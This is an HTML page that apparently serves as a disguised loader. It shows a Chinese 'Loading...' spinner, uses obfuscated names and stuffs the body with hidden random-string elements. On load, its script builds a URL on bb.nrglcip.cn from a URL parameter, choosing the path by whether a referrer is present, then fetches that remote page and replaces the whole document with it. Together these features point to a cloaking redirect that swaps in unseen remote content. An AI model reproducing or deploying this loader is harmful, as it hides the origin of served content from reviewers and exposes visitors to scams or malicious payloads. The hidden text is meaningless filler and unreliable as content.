<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bChtMk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bChtMk .Kr1Iez {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bChtMk .content {
            line-height: 50px;
            text-align: center
        }

        .bChtMk .img {
            width: 100%
        }

        .bChtMk .nWErzpQiFgS {
            text-align: center
        }

        .bChtMk .nWErzpQiFgS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bChtMk .nWErzpQiFgS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bChtMk .nWErzpQiFgS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bChtMk .nWErzpQiFgS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bChtMk .nWErzpQiFgS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bChtMk .nWErzpQiFgS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bChtMk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ks09OtIDMPh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dTESWLP = ks09OtIDMPh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dTESWLP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dTESWLP +".html?a=share";
		}
		
        RkaIOcb=url+"#"+new Date().getTime();
        RkaIOcb && function() {
            $.get(RkaIOcb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >vzZKRDvQeUv9mhTWwYQIdAcVwKXpfxgaP27vFyteT0xiDqZC5a94ydS76ZnSJ7cLxSOdtCC83UqboH5y5ktL3IN5OVDY6zUZxPCK</h1>
<b style='display:none' >NZya1R07m52iXsKGqX2CvuUlo8E4btvVvJEflTSfZyycs0tNbyVFYVn2QKj5fK9J4ZETQv4OX6ZlHBnGGXCAChzSVl</b>
<b style='display:none' >NZya1R07m52iXsKGqX2CvuUlo8E4btvVvJEflTSfZyycs0tNbyVFYVn2QKj5fK9J4ZETQv4OX6ZlHBnGGXCAChzSVl</b>
<li style='display:none' >BZs6SV3jzcjCB4Yp8p6cjpDJaDRSOuK</li>
<b style='display:none' >NZya1R07m52iXsKGqX2CvuUlo8E4btvVvJEflTSfZyycs0tNbyVFYVn2QKj5fK9J4ZETQv4OX6ZlHBnGGXCAChzSVl</b>
<li style='display:none' >BZs6SV3jzcjCB4Yp8p6cjpDJaDRSOuK</li>
<img  src='' style='display:none'><div class="bChtMk">
    <div class="Kr1Iez">
        <div class="nWErzpQiFgS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >qOt8bMmmVvlSri</ul>
<p  style='display:none'>nsf1k7edaDYQ2MNVKBazfnp3PQa3Rz0MTuHYgz89pH4</p>
<img  src='' style='display:none'>
<ul style='display:none' >qOt8bMmmVvlSri</ul>
<div style='display:none'>kLOKY7B4mrr34h2Y9y5D2lAd2a7JJfKirREB02NeWkqBF9HGwr22jeVknpnVVQXXMSYZNgInsHr3LjN</div>
<img  src='' style='display:none'>
<ul style='display:none' >qOt8bMmmVvlSri</ul></body>
</html>